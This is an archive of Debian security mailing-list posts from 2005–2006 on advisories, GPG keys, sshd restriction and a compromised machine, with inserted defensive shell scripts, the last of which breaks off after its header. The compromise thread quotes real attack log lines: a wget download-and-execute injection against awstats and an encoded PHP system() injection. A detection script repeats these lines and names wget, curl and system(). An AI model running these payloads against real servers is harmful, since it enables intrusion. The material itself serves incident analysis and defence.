> > Vulnerability  : buffer overflow
> > Problem-Type   : local(remote)
> 
> What does mean 
>   local(remote)
> 
> Does it means local... or remote?

  Local.  But remote in the sense that you may receive a .tar file
 from a remote source.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/





Re: first A record of security.debian.org extremely slow

2006-03-02 Thread Steve Kemp
On Thu, Mar 02, 2006 at 10:36:16PM +0100, Marc Haber wrote:

> How would you implement the automatism to trigger the update on the
> incoming e-mail?

  procmail, matching on new mails to the debian-security-announce
 mailing list ..

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/





Re: CVE-2006-0225, scponly shell command possible

2006-02-15 Thread Steve Kemp
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote:

> This bug has been closed for unstable (see bug 350964) with the 4.6
> upload, but will it be fixed for sarge?

  Please see DSA-969-1 released two days ago:

http://www.us.debian.org/security/2006/dsa-969

  Sarge is fixed.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/





Re: Removing email addresses from gpg-key?

2006-01-24 Thread Steve Kemp
On Tue, Jan 24, 2006 at 01:54:24PM +, Jonathan McDowell wrote:

> You want to revoke the uids (revuid) rather than deleting them; there's
> no way you can delete them off other people's keyrings, or the
> keyservers, so you mark them as deleted instead by revoking them.

  Thanks for that.  Obvious once you said it too!

  I've revoked the obsolete email addresses and uploaded again now.

Steve
--





Removing email addresses from gpg-key?

2006-01-24 Thread Steve Kemp


  I'm trying to remove a couple of obsolete email addresses from my GPG key.

  Using the "deluid" command available after running "gpg --edit-key" works
 successfully.  But once I upload my modified key to various keyservers I
 see the identities being re-added by the keyserver at debian.org:


  After removing some identities:

  [EMAIL PROTECTED]:~$ gpg --list-key CD4C0D9D
  pub   1024D/CD4C0D9D 2002-05-29
  uid  Steve Kemp <[EMAIL PROTECTED]>
  uid  Steve Kemp <[EMAIL PROTECTED]>
  uid  Steve Kemp <[EMAIL PROTECTED]>
  sub   2048g/AC995563 2002-05-29

  Now I upload the key to various servers.

  *time passes*

  Finally I refresh it:

[EMAIL PROTECTED]:~$ gpg --keyserver keyring.debian.org --recv-keys CD4C0D9D
gpg: requesting key CD4C0D9D from hkp server keyring.debian.org
gpg: key CD4C0D9D: "Steve Kemp <[EMAIL PROTECTED]>" 2 new user IDs
gpg: key CD4C0D9D: "Steve Kemp <[EMAIL PROTECTED]>" 23 new signatures
gpg: Total number processed: 1
gpg:   new user IDs: 2
gpg: new signatures: 23


  Here we see "new user IDs:2" - and as this suggests the removed IDs
 are back!  I don't want them anymore!

  What can I do in this case?  Is it just a matter of being more patient
 after uploading the key?  Or should I report a bug to the Debian keyring
 pseudo-package?

Steve
-- 
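Jonathan's advice in the reply above (revoke the UIDs rather than delete them) and the refresh output in this post come down to one check: once the revoked key has been sent to the keyserver and fetched back, the obsolete UIDs must show up as revoked, not merely absent. The script below is an added example, not code from the thread. It parses gpg's machine-readable colon listing, in which field 2 is the validity ("r" for revoked) and field 10 the user ID. The sample listing is constructed: the short key ID is the one from the post, while the long key ID, fingerprints and addresses are placeholders. gpg itself appears only in comments, so the script runs without it.

```shell
#!/bin/sh
# Added example, not from the thread. Confirm that revoked user IDs are
# really marked revoked in the copy the keyserver hands back.
#
# The procedure (not run here):
#   gpg --edit-key CD4C0D9D            # then: uid N, revuid, save
#   gpg --keyserver keyring.debian.org --send-keys CD4C0D9D
#   gpg --keyserver keyring.debian.org --recv-keys CD4C0D9D
#   gpg --with-colons --list-keys CD4C0D9D | uid_status

# Constructed colon-format listing; long key ID, fingerprints and
# addresses are placeholders.
SAMPLE_LISTING='tru::1:1137000000:0:3:1:5
pub:-:1024:17:00000000CD4C0D9D:2002-05-29:::-:::scESC::::::23::0:
uid:-::::2002-05-29::0123456789ABCDEF0123456789ABCDEF01234567::Steve Kemp <steve@example.org>::::::::::0:
uid:r::::2006-01-24::89ABCDEF0123456789ABCDEF0123456789ABCDEF::Steve Kemp <old@example.net>::::::::::0:
uid:r::::2006-01-24::FEDCBA9876543210FEDCBA9876543210FEDCBA98::Steve Kemp <older@example.com>::::::::::0:
sub:-:2048:16:00000000AC995563:2002-05-29::::::e::::::23:'

# One line per user ID: "revoked <uid>" or "active <uid>".
# Field 2 of a uid record is its validity; "r" means revoked.
uid_status() {
    awk -F: '$1 == "uid" {
        status = ($2 == "r") ? "revoked" : "active"
        print status, $10
    }'
}

# Exit 0 only if at least one user ID contains the pattern and every such
# user ID is revoked; use it after --recv-keys to confirm the keyserver
# copy has caught up.
assert_uid_revoked() {
    awk -F: -v pat="$1" '
        $1 == "uid" && index($10, pat) > 0 { seen++; if ($2 != "r") live++ }
        END { exit (seen == 0 || live > 0) ? 1 : 0 }'
}

# Stand-alone demonstration on the constructed listing.
printf '%s\n' "$SAMPLE_LISTING" | uid_status
```

Run the real check with `gpg --with-colons --list-keys CD4C0D9D | assert_uid_revoked old@example.net` after each `--recv-keys`; a non-zero exit means the keyserver copy still carries the UID as live, which is the case the "2 new user IDs" output in the post describes.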



Re: [SECURITY] [DSA 945-1] New antiword packages fix insecure temporary file creation

2006-01-17 Thread Steve Kemp
On Tue, Jan 17, 2006 at 07:59:45PM +0100, Florian Weimer wrote:

> AFAICS, this rule is quite reasonable, so I assume that this antiword
> version is just a minor glitch.  Correct?

  Yes.  My fault entirely.  It actually took me a while to see what
 was wrong there - usually I just add 'sargeN' to the string, but for
 some reason I've updated the minor too.

  Definitely something I'll be careful to avoid in the future.

Steve
-- 





Re: [SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability

2006-01-09 Thread Steve Kemp
On Mon, Jan 09, 2006 at 02:32:18PM +0100, Thijs Kinkhorst wrote:

> >For the unstable distribution the package will be updated shortly.
> >  
> It's great to hear that unstable will be fixed soon, but why wasn't 
> there a grave bug filed against the package? If for some reason the 
> maintainer misses this DSA, it is lateron unknown that the version in 
> unstable is vulnerable and still needs to be fixed...

  A bug has been filed.  If there is no action in a short space
 of time I'm happy to perform an NMU.

  Testing will get the fix shortly via the package migration, so it
 is only sid users who are at risk; and we don't offer explicit
 security support there.  (Though obviously it should be fixed ASAP.)

Steve
--





Re: hardening checkpoints

2005-12-21 Thread steve
On Wednesday, 21 December 2005 12:40, Johannes Wiedersich wrote:
> steve wrote:
> > On Tuesday, 20 December 2005 16:18, Michelle Konzack wrote:
> >>But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System
> >>with my preferred Desktop.  In all Internet Cafes I get an IP via DHCP.
> >
> > Wrong. I was in Milano (Italy) a few months ago, and I wanted to do
> > exactly that. The person at the desk looked at me as if I were a Martian
> > when I asked her if I could reboot the machine on my personal Debian
> > live-cd. First, she didn't understand what all that was about, and second
> > she couldn't control my connection time, so she simply refused. Moreover,
> > in Italy you have to give an ID (they do a photocopy of it; she couldn't
> > tell me how long they keep it..)  to be able to use a computer in an
> > Internet Café (terrorism you know...).
> >
> > Sorry ;-)
>
> Wrong: in Europe you shouldn't mix Italy with France. 

right : you eat better in France than in Italy.

No, being serious again, I read Michelle's post a bit too fast and I mixed 
things up. I don't know why, but I thought she was thinking of Europe in her 
post.

> I don't know 
> anything about Italian or French internet cafes,  but I would be really
> surprised, if there would be anything similar in the way their
> administration works.

You're right, they don't, politics is now the difference, at least in Internet 
Cafés.

> For Italy, no matter what you do or where you are, it is always a sure
> bet, that the person behind the counter (hotel, airport, etc. etc.
> internet cafe) won't allow anything 'unusual' without double and triple
> checking with his/her boss.

.. who is rarely there. So Michelle's solution seems to be quite unrealistic.

> This usually means that you have to insist and wait.

I'm ok with waiting 5 minutes, but more is too much, especially when you're 
just looking for a theatre's timetable and you're in a hurry (and the 
theatre's phone is down. Own experience.)

> (In Italy 'unusual' means 'slightly different from normal'). 

I'll let you have the responsibility of that definition ;-)

> Short message: two countries in Europe (say Italy and France) are about
> as different from each other as any European country is from say the US.

I'm with you on that one. But living near France, I'm very much willing to go 
there and give it a try. Just for the sake of it. But, I don't know why, I 
feel that my live-cd won't be very much appreciated.. really too scary stuff, 
isn't it?

> Johannes

-- 
steve
jabber : [EMAIL PROTECTED]



Re: hardening checkpoints

2005-12-21 Thread steve
On Tuesday, 20 December 2005 16:18, Michelle Konzack wrote:

> But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System
> with my preferred Desktop.  In all Internet Cafes I get an IP via DHCP.

Wrong. I was in Milano (Italy) a few months ago, and I wanted to do exactly 
that. The person at the desk looked at me as if I were a Martian when I asked 
her if I could reboot the machine on my personal Debian live-cd. First, she 
didn't understand what all that was about, and second she couldn't control my 
connection time, so she simply refused. Moreover, in Italy you have to give 
an ID (they do a photocopy of it; she couldn't tell me how long they keep 
it..)  to be able to use a computer in an Internet Café (terrorism you 
know...).

Sorry ;-)


> Greetings
> Michelle

Have a nice day

-- 
steve
jabber : [EMAIL PROTECTED]



Re: Restricting ssh access to internet but not to internal network

2005-11-25 Thread Steve Suehring

I would likely restrict access to ssh from external, if at all possible. 
I realize that this isn't always possible but it should be possible to
at least narrow down access to certain IP ranges.

For this particular problem I'm assuming there are two NICs in the
computer, one with an IP in private space and the other with a public
address?  One idea is to bind two SSH daemons, one for each NIC.  Place
no AllowGroups restriction on the internal SSH daemon.  This means 
that all users can connect internally.  On the SSH daemon bound 
externally place the AllowGroups restriction to restrict access to 
members of that group.

If there's only one NIC in the computer then you could still use two SSH 
daemons, just bind them to different ports.  The internal port might be 
the standard tcp/22 whereas externally you would bind tcp/ or 
something.  Then firewall off the access to port 22 from externally so 
that the internal-use daemon can't be accessed.

Hope that helps.  I'm sure others will have ideas too.

Steve


On Thu, Nov 24, 2005 at 10:14:11PM -0800, Patrick wrote:
> I have a server running sshd on Sarge. I want all users to be able to
> access the computer from within the internal network - but restrict
> access from the internet (to users in a particular group). Can this be
> achieved by combining the /etc/hosts.allow or /etc/hosts.deny files and
> the AllowGroup (or AllowUsers) options in sshd configuration file?
> 
> If so, how ?
> 
> 
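The two-daemon layout Steve describes, as an added example that is not part of the original post: one sshd_config bound to the private address with no group restriction, a second bound to the public address with AllowGroups, and a small checker for the property that matters on the external one. The addresses, the group name "remote-ssh" and the file paths are assumptions; sshd itself is only shown in comments, so the script runs without it.

```shell
#!/bin/sh
# Added example, not from the thread. Two sshd_config files for the
# two-daemon setup, plus a check that the Internet-facing one is bound to
# one explicit address, limited to a group, and closed to root.
# Start-up (not run here):
#   /usr/sbin/sshd -f /etc/ssh/sshd_config.internal
#   /usr/sbin/sshd -f /etc/ssh/sshd_config.external

INTERNAL_CONF='# /etc/ssh/sshd_config.internal (assumed path)
Port 22
ListenAddress 192.168.1.10
PidFile /var/run/sshd-internal.pid
PermitRootLogin no'

EXTERNAL_CONF='# /etc/ssh/sshd_config.external (assumed path)
Port 22
ListenAddress 203.0.113.10
PidFile /var/run/sshd-external.pid
PermitRootLogin no
PasswordAuthentication no
AllowGroups remote-ssh'

# Value of keyword $2 in the config text $1. As in sshd, the first
# occurrence wins and keywords match case-insensitively.
sshd_config_get() {
    printf '%s\n' "$1" | awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/ || NF == 0 { next }
        tolower($1) == key { $1 = ""; sub(/^ /, ""); print; exit }'
}

# Succeed only if the config is fit to face the Internet: bound to one
# explicit address (so it cannot shadow the internal daemon on 0.0.0.0),
# restricted to a group, and with root login refused.
check_external_sshd_config() {
    addr=$(sshd_config_get "$1" ListenAddress)
    allowed=$(sshd_config_get "$1" AllowGroups)
    rootlogin=$(sshd_config_get "$1" PermitRootLogin)
    case "$addr" in
        ''|0.0.0.0|'::'|'[::]') echo "FAIL: no explicit ListenAddress"; return 1 ;;
    esac
    [ -n "$allowed" ] || { echo "FAIL: no AllowGroups restriction"; return 1; }
    [ "$rootlogin" = no ] || { echo "FAIL: PermitRootLogin must be no"; return 1; }
    echo "OK: $addr restricted to group(s): $allowed"
}

# Stand-alone demonstration: the external config passes, the internal one
# (deliberately unrestricted) does not.
check_external_sshd_config "$EXTERNAL_CONF"
check_external_sshd_config "$INTERNAL_CONF" || true
```

With a single NIC, give the external config a different Port (2222, say) instead of a second ListenAddress, keep the internal daemon on 22, and drop port 22 from the outside interface, e.g. `iptables -A INPUT -i eth0 -p tcp --dport 22 -j DROP` (interface name assumed). Run `sshd -t -f <file>` against each file before starting the daemons so a typo does not leave one of them unbound.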



Re: What is a security bug?

2005-11-23 Thread Steve Kemp
On Wed, Nov 23, 2005 at 12:15:35PM +0100, Jasper Filon wrote:
> Well, obviously it is not a _security_ bug, since it has nothing to do
> with security. However, it is a bug, maybe even a critical one. 

  I filed a couple of bugs on Mozilla relating to DOS attacks,
 crashing the browser on some badly formed input HTML.

  They were not treated as security bugs which surprised me at
 the time.

Steve
--




Re: PMASA-2005-6 when "register_globals = on"

2005-11-15 Thread Steve Kemp
On Tue, Nov 15, 2005 at 05:54:32PM +0100, Piotr Roszatycki wrote:
> http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 reports 
> that sarge's phpmyadmin package has a security flaw which occurs only if 
> "register_globals = on" setting is used.
> 
> This feature is disabled in Debian package by default so I doubt if this is 
> a serious problem. I'd like to ask if I should prepare the new package for 
> sarge or not?

  I think an upload would be justified.

Steve
--





Re: What's going on with advisory for phpmyadmin?

2005-10-28 Thread Steve Kemp
On Fri, Oct 28, 2005 at 11:01:29AM -0500, John Goerzen wrote:

> > > Could someone from the security team comment on what the problem is?
> > 
> >   The problem is that we receive a lot of reports, each of which may
> >  involve a significant amount of time to attend to.
> 
> Well, that's a symptom.  Isn't the root problem not enough people on the
> team in this case?

  That is almost certainly the case, however adding more members is still
 not going to result in immediate updates.

  (Things like timezones, coordination, and other practicalities come
 into play with more members.  Not to mention waiting for other vendors,
 upstream etc, is not something that will be helped by more members).

Steve
--




Re: What's going on with advisory for phpmyadmin?

2005-10-28 Thread Steve Kemp
On Fri, Oct 28, 2005 at 10:16:03AM -0500, John Goerzen wrote:
> On Fri, Oct 28, 2005 at 04:42:31PM +0200, Piotr Roszatycki wrote:
> > Why was my report ignored? I've reported the problem 3 days ago and I had 
> > no reply.
> 
> This seems to be a very frequent problem going on for awhile now.
> 
> Could someone from the security team comment on what the problem is?

  The problem is that we receive a lot of reports, each of which may
 involve a significant amount of time to attend to.

  New entries are pushed onto the stack almost daily.  Whilst some
 are simple and can be dealt with easily some are more complex and
 obviously we cannot disclose them publicly.

  If it is useful I could begin sending out a form response, something
 like "Yes we received your report, yes we will fix it, please have
 patience".

  However a useful response such as "Yes we've got your package report
 and we'll update an advisory after we've done openssh, mozilla, the
 kernel." is not going to happen.  Even estimating an advisory date
 is going to be non-trivial.

  (NOTE: Package names above are chosen at random ...)

  Sometimes an issue will be responded to, fixed, and uploaded all in the
 same day.  Sometimes it takes longer to:

* Confirm the problem.
* Produce a patch.
* Communicate with the package maintainer to discover when the Sid
 version will be tested.
* Communicate with other Linux distributions to make sure that the
 package can be updated by multiple distributions in a coordinated fashion.
* Communicate with the upstream developers to let them know, if
 they don't know so far.
* Allocate and assign a unique ID for the issue.

  The best thing that you can do when reporting problems is:

a) Be detailed.
b) Ideally have a patch, or a pointer to one.
c) Be patient.
d) Don't file reports which are already in the BTS.
e) Be patient.
f) Be patient.

  All reports are read and responded to *in time*.  Be patient.

  None of this is news. 

Steve
--




Re: [SECURITY] [DSA 862-1] New Ruby 1.6 packages fix safety bypass

2005-10-11 Thread Steve Kemp
On Tue, Oct 11, 2005 at 09:32:57AM +0200, Wolfgang Jeltsch wrote:
> Am Dienstag, 11. Oktober 2005 09:01 schrieb Martin Schulze:
> > [...]
> 
> > Package: ruby1.8
> 
> Ruby 1.6 or Ruby 1.8?

  Both.

  See the table:

http://www.us.debian.org/security/2005/dsa-860
http://www.us.debian.org/security/2005/dsa-862

Steve
--





security.debian.org - Infrastructure updates

2005-10-05 Thread Steve Kemp

Hi,

  Just a quick note to point people at this news announcement:

http://lists.debian.org/debian-news/debian-news-2005/msg00047.html


Steve
--




Re: ClamAV vulnerability

2005-09-26 Thread Steve Kemp
On Mon, Sep 26, 2005 at 05:36:27AM -0700, P PRABHU wrote:

> Any fix for the latest ClamAV buffer overflow in the
> file "upx.c" vulnerability. Currently .deb based
> version is 0.84-2.sarge.2 . Is this version subject to
> this vulnerability ?? If so any fix will be released

  A DSA is pending, and should be available shortly.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Re: security.debian.org timeouts

2005-09-19 Thread Steve Kemp
On Mon, Sep 19, 2005 at 09:18:29PM +0200, Noèl Köthe wrote:

> anybody knows what's the problem with klecker/security.d.o?

http://lists.debian.org/debian-curiosa/2005/09/msg00018.html

  There is an advisory pending ...

Steve
--





Re: Unusual incoming traffic detected from klecker.debian.org and source.rfc822.org

2005-09-14 Thread Steve Kemp
On Wed, Sep 14, 2005 at 10:51:19AM +0200, Mathieu JANIN wrote:

> I was updating my system at that time, but klecker.debian.org is not in my
> sources (or perhaps with another name).

  klecker.debian.org is security.debian.org, which might explain it?

Steve
-- 





Re: Bad press again...

2005-08-29 Thread Steve Wray
Florian Weimer wrote:
> * Steve Wray:
> 
> 
>>>>I view this as a security problem because what if you *think* you've
>>>>made changes to your firewall and are now protected only... you aren't
>>>>and the firewall hasn't been updated?
>>>>
>>>>Is that enough of a security problem for the fix to get into stable?
[snip]
>>When the fwbuilder application tries to write to the file, it fails.
>>This exception doesn't appear to be handled by anything at all and hence
>>the silent failure to write to the file.
>>
>>The issue of actually testing firewall configurations is a whole 'nother
>>problem.
> 
> 
> But you agree that automated tests of the configuration, after it has
> been written and applied, would detect such a problem (if there are
> proper test cases, of course)?

Regression testing of firewall rules would have to be the 'holy grail'
of the work we do here, where there are approximately one bazillion
firewalls to manage, with regular changes to production systems.

It'd need some serious AI programming though and probably some sort of
netfilter simulator. It shouldn't be too hard to implement in an
appropriate language. Prolog or one of the 'constraint programming'
languages perhaps. But this, while fascinating, is getting way off topic
:)

> I'm NOT saying that the bug shouldn't be fixed.  What I want to say
> that the mere occurrence of such a bug is a symptom of a larger
> problem in the software.  If we start labeling such symptoms as
> security bugs, we can probably issue five DSAs a week for ordinary
> bugs in software which is somewhat security-related.  ("GnuPG crashes,
> and users might skip verification of a signature on an important
> document, putting them at risk" -- is this really a security bug?)

This is very true and pretty well what I'm getting at. I don't believe
that there can be any hard and fast rules as to what counts as enough of
a bug to count as a security bug. It's down to people making decisions.

In the end, I imagine that a lot of production sites out there are
*having* to move to debian 'backports'. They certainly were for woody...

Now is *that* good for anyone concerned? I don't believe that it is; the
backport packages probably don't get anywhere near the QA that packages
that actually go into 'stable' get.

Sometimes I get the feeling that the end user must choose between
reliability and security which is, in truth, a total oxymoron.

I just get the feeling that things today move too fast to hold any
distribution to a very strict interpretation of 'stable'.





Re: Bad press again...

2005-08-29 Thread Steve Wray
Florian Weimer wrote:
> * Steve Wray:
> 
> 
>>Another example is fwbuilder which *silently* fails to overwrite its
>>generated script at compile time if the user doesn't have write
>>permissions on the existing script.
> 
> 
> Most bugs in security tools are security bugs.  We have to draw a line
> somewhere, otherwise "stable" becomes meaningless.

Actually, having followed the mozilla/firefox discussion and various
other thread on this list, I am inclined to believe that the concept of
a "stable" distribution in the modern internet/open source environment
is already meaningless.

>>I view this as a security problem because what if you *think* you've
>>made changes to your firewall and are now protected only... you aren't
>>and the firewall hasn't been updated?
>>
>>Is that enough of a security problem for the fix to get into stable?
> 
> 
> The underlying problem seems to be that fwbuilder does not provide
> means to test a configuration after it has been applied to the system.
> Such tests would catch a more general class of problems, and not just
> some isolated file system problem.

Not quite.

When the fwbuilder application tries to write to the file, it fails.
This exception doesn't appear to be handled by anything at all and hence
the silent failure to write to the file.

The issue of actually testing firewall configurations is a whole 'nother
problem.






Re: Bad press again...

2005-08-29 Thread Steve Wray
Florian Weimer wrote:
> * Michael Stone:
> 
> 
>>Contact the security team. Describe the bug in such a way that the
>>security team understands its severity and impact. It is not sufficient
>>to say "just trust me and issue an advisory". From what I've seen so far
>>this is not the obvious buffer overflow sort of bug, it's a configured
>>behavior which deviates from some documented expectation. The question,
>>then, is how that deviation occurs, what the documented expectation is,
>>and (most importantly for stable) is there any chance that someone might
>>be relying on the implemented behavior rather than the documented
>>behavior.
> 
> 
> It seems that shorewall generates an ACL that ACCEPTs all traffic once
> a MAC rule matches.  Further rules are not considered.  The
> explanations in version 2.2.3 seem to indicate that this was the
> intended behavior, but its implications surprised upstream, and a
> corrected version was released.
> 
> IMHO, Debian should publish at least a DSA that explains this
> discrepancy, especially if the package maintainer also thinks that
> it's necessary.

It seems to be fairly tricky to determine how much of a security risk a
bug has to be before a fix will find its way into stable.

Another example is fwbuilder which *silently* fails to overwrite its
generated script at compile time if the user doesn't have write
permissions on the existing script.

I view this as a security problem because what if you *think* you've
made changes to your firewall and are now protected only... you aren't
and the firewall hasn't been updated?

Is that enough of a security problem for the fix to get into stable?

Who decides?





Re: Bad press again...

2005-08-29 Thread Steve Kemp
On Mon, Aug 29, 2005 at 11:46:24AM -0500, Branden Robinson / Debian Project Leader wrote:

> As far as I know, the stable/oldstable security team was never (recently)
> down to Joey S. alone.  Mike Stone and Steve Kemp have been active members
> for some time (Steve was, as I understand it, promoted from secretary to
> full member within the past couple of months).

  Steve (me) still remains a secretary, rather than a full member.

Steve
--





Re: On Mozilla-* updates

2005-07-31 Thread Steve Kemp
On Sun, Jul 31, 2005 at 06:18:18PM +0100, antgel wrote:

> Any chance of an elaboration?  I wasn't privy to any previous discussion
> on this and I'm interested.  What's the problem with searching bugzilla
> for security patches on given versions, and applying them?  Is it the
> sheer volume?



http://kitenet.net/~joey/blog/entry/bug_hiding_systems-2005-07-30-06-25.html

  Summary:  Even when new fixed packages are available the original
 bugs reported in Mozilla's BugZilla system are non public, as are
 patches.

  Mozilla *appears* to have no interest in supplying patches which 
 *only* fix security holes to distributors.  Their line is more
 "upgrade to the newest version".  Whilst the new versions do
 fix the holes, they traditionally also break things built against
 them, such as extensions, galeon, etc.

  Which is why we're seeing the problem now.

Steve
--





Re: a compromised machine

2005-07-24 Thread Steve Kemp
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:

> Since the process runs as "www-data" some kiddy has abused a web service
> on your server to download and run an external software. Look for
> suspicious log lines of your web server.

  Yes ..

> Examples of hacks on our servers:
> 
> 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

> 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"
> 
> It should be rather easy finding signs of weird accesses like %20 or
> chr(). Also look for weird signs in /tmp.

  Both of these attacks could be prevented by the use of mod_security,
 which I'd recommend you look into using in the future if you have
 potentially untrusted scripts running.

Steve
--
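The two log lines Christoph quotes are the kind of request mod_security is deployed to reject, and the "look for %20 or chr()" advice can be turned into a check that decodes the request first, so the payload is visible in plain text (the second one double-encodes a PHP `'.system(chr(...)...)'` injection that spells out `ls -la /var/www`). The script below is an added example, not code from the thread. The first two log lines are the quoted ones rejoined onto single lines; the third is a constructed benign request; the set of metacharacters and keywords it flags is this example's own choice.

```shell
#!/bin/sh
# Added example, not from the thread. Decode the percent-encoding in the
# request field of Apache access-log lines and flag lines whose decoded
# request carries a shell or PHP injection payload.

# Two lines quoted in the thread (rejoined) plus one constructed benign hit.
SAMPLE_LOG='82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"
192.0.2.7 - - [04/Dec/2004:17:44:00 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=debian HTTP/1.0" 200 1024 "-" "Mozilla/5.0"'

# Decode %XX sequences once, in portable awk (no gawk-only builtins).
# Malformed escapes such as "%zz" are passed through unchanged.
urldecode() {
    awk '
    BEGIN { hex = "0123456789abcdef" }
    {
        s = $0; out = ""
        while ((p = index(s, "%")) > 0) {
            out = out substr(s, 1, p - 1)
            h = tolower(substr(s, p + 1, 2))
            c1 = index(hex, substr(h, 1, 1)); c2 = index(hex, substr(h, 2, 1))
            if (length(h) == 2 && c1 > 0 && c2 > 0) {
                out = out sprintf("%c", (c1 - 1) * 16 + (c2 - 1))
                s = substr(s, p + 3)
            } else {
                out = out "%"
                s = substr(s, p + 1)
            }
        }
        print out s
    }'
}

# Print "<client> <decoded request>" for each line whose request, after
# decoding, contains shell metacharacters, a downloader, /tmp, or the PHP
# system()/chr() idiom. Decoding runs twice because attackers double-encode
# (%2527 -> %27 -> ') to slip past filters that decode only once.
flag_injection_attempts() {
    while IFS= read -r line; do
        client=$(printf '%s\n' "$line" | awk '{ print $1 }')
        raw=$(printf '%s\n' "$line" | awk '{ print $7 }')   # request target
        decoded=$(printf '%s\n' "$raw" | urldecode | urldecode)
        case "$decoded" in
            *';'*|*'|'*|*'`'*|*'$('*|*'wget '*|*'curl '*|*'/tmp/'*|*'system('*|*'chr('*)
                printf '%s %s\n' "$client" "$decoded" ;;
        esac
    done
}

# Stand-alone demonstration on the sample log.
printf '%s\n' "$SAMPLE_LOG" | flag_injection_attempts
```

Feed a real log with `flag_injection_attempts < /var/log/apache/access.log`; anything it prints for a script you run is a request worth a closer look, and the decoded form is also what you would paste into a mod_security rule when deciding what to block.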





Re: My machine was hacked - possibly via sshd?

2005-07-20 Thread Steve Kemp
On Wed, Jul 20, 2005 at 10:17:56AM -0700, Brent Bates wrote:
> This morning my machine was also compromised in a similar fashion as 
> described in your post here.
> 
> http://lists.debian.org/debian-security/2005/03/msg00112.html
> 
> Was the point of entry ever determined?

  That one seemed to be a fairly obvious weak password which was
 escalated into a root attack via a local kernel flaw.

  
> I just happened to log onto my machine while this was taking place.  I did
> a ps and killed everything except non essential processes and mounted a
> directory tree I had with known good binaries and used those to poke
> around the machine.
> 
> I have no idea how they got in, there were a lot of processes running as 
> nobody.  I really only run apache as nobody, so that could be the point of 
> entry.  

  What CGI / PHP / scripts are you running with Apache?

> root 955 1 0 Jan10 ? 00:00:11 /usr/local/apache/bin/httpd

  That's not a Debian package.

> root 1471 1 0 Jan10 ? 00:00:00 /usr/local/snmp/sbin/snmpd

  Neither is that.

  If you're going to run non-Debian packages you must keep track of
 them and make sure they are up to date.  Have you done so ..?

> bates 24862 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
> root 16095 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio

  Don't recognise either of those.

> nobody 4824 4752 0 06:40 ? 00:00:00 ./ptr3
> nobody 4825 4824 0 06:40 ? 00:00:00 [ptr3 ]
> nobody 4826 4824 0 06:40 ? 00:00:00 [ptr3 ]

  Local kernel exploitation attempts ..?

> root 4920 1 0 06:41 ? 00:00:00 chmod 755 /usr/local/bin/ssh2
> root 4925 4920 0 06:41 ? 00:00:00 [chmod ]
> root 4927 1 0 06:41 ? 00:00:00 mv -f sshd /usr/sbin/sshd
> root 4929 1 0 06:41 ? 00:00:00 chown root.bin /usr/sbin/sshd

  Trojan installation ..?

> nobody 4967 4964 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025

  IP address of attacker ..?

> nobody 5030 5005 0 06:43 ? 00:00:00 ./traci
> nobody 5031 5030 0 06:43 ? 00:00:00 ./traci
> nobody 5032 5030 0 06:43 ? 00:00:00 [traci ]
> root 5033 5030 0 06:43 ? 00:00:00 [modprobe ]

  Kernel attempt again ..?

  Lots of detail there .. but it is a bit hard to understand without
 more knowledge of what is upon your system, etc.

  My immediate suggestion would be to disconnect the machine from the
 network, and proceed from there.  If you have a tripwire/aide/checksumming
 installation in place you can use that to detect binary modifications 
 by booting from a known-good media.

  If not your best option is to try to determine what route the attacker 
 used to get in, make sure you're comfortable you can close it, and then
 reinstall.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit
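Steve's line-by-line reading of the process list (service account running `./ptr3`, bracketed names pretending to be kernel threads, root processes shuffling an sshd binary around, a root child of a `nobody` process) is a set of heuristics that can be applied mechanically to `ps -ef` output before the box is taken off the network. The script below is an added example, not code from the thread; the process table is constructed from the lines quoted above with a few additions (a www-data httpd worker and two genuine kernel threads) so the rules have something not to fire on. It assumes a 2.6-style tree where kernel threads descend from pid 2; on kernels where they hang off pid 1, the bracket rule needs that adjustment.

```shell
#!/bin/sh
# Added example, not from the thread. Triage a "ps -ef" listing with the
# heuristics used in the reply above. Input: standard ps -ef columns
# (UID PID PPID C STIME TTY TIME CMD), header line first.

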